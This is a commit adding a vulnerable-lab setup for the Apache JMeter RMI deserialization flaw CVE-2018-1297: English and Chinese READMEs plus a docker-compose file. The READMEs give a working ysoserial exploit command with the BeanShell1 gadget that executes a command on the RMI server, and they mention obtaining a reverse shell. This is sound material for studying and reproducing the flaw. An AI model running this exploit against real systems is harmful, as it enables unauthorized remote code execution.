first commit

jmeter/CVE-2018-1297/README.md

@@ -0,0 +1,33 @@
+# Apache JMeter RMI Deserialization Remote Code Execution (CVE-2018-1297)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Apache JMeter is an Apache project that can be used as a load testing tool for analyzing and measuring the performance of a variety of services, with a focus on web applications.
+
+When using Distributed Test only (RMI based), Apache JMeter 2.x and 3.x uses an unsecured RMI connection. This could allow an attacker to get Access to JMeterEngine and send unauthorized code.
+
+## Vulnerable environment
+
+Execute following command to start a JMeter v3.3 RMI server:
+
+```
+docker compose up -d
+```
+
+After the server is started, the RMI is listening on port 1099.
+
+## Exploit
+
+Use [ysoserial](https://github.com/frohoff/ysoserial) to exploit the deserialization by the gadget `BeanShell1`:
+
+```
+java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit your-ip 1099 BeanShell1 'touch /tmp/success'
+```
+
+Execute `docker compose exec jmeter bash` to enter the container, you will see the `/tmp/success` has been created:
+
+![](1.png)
+
+Get a reverse shell:
+
+![](2.png)

jmeter/CVE-2018-1297/README.zh-cn.md

@@ -0,0 +1,29 @@
+# Apache JMeter RMI 反序列化命令执行漏洞（CVE-2018-1297）
+
+Apache JMeter是美国阿帕奇（Apache）软件基金会的一套使用Java语言编写的用于压力测试和性能测试的开源软件。其2.x版本和3.x版本中存在反序列化漏洞，攻击者可以利用该漏洞在目标服务器上执行任意命令。
+
+## 漏洞环境
+
+运行漏洞环境：
+
+```
+docker compose up -d
+```
+
+运行完成后，将启动一个RMI服务并监听1099端口。
+
+## 漏洞复现
+
+直接使用ysoserial即可进行利用：
+
+```
+java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit your-ip 1099 BeanShell1 'touch /tmp/success'
+```
+
+我们使用的是BeanShell1这条利用链。使用`docker compose exec jmeter bash`进入容器，可见`/tmp/success`已成功创建：
+
+![](1.png)
+
+反弹shell:
+
+![](2.png)

jmeter/CVE-2018-1297/docker-compose.yml

@@ -0,0 +1,6 @@
+version: '2'
+services:
+ jmeter:
+   image: vulhub/jmeter:3.3
+   ports:
+    - "1099:1099"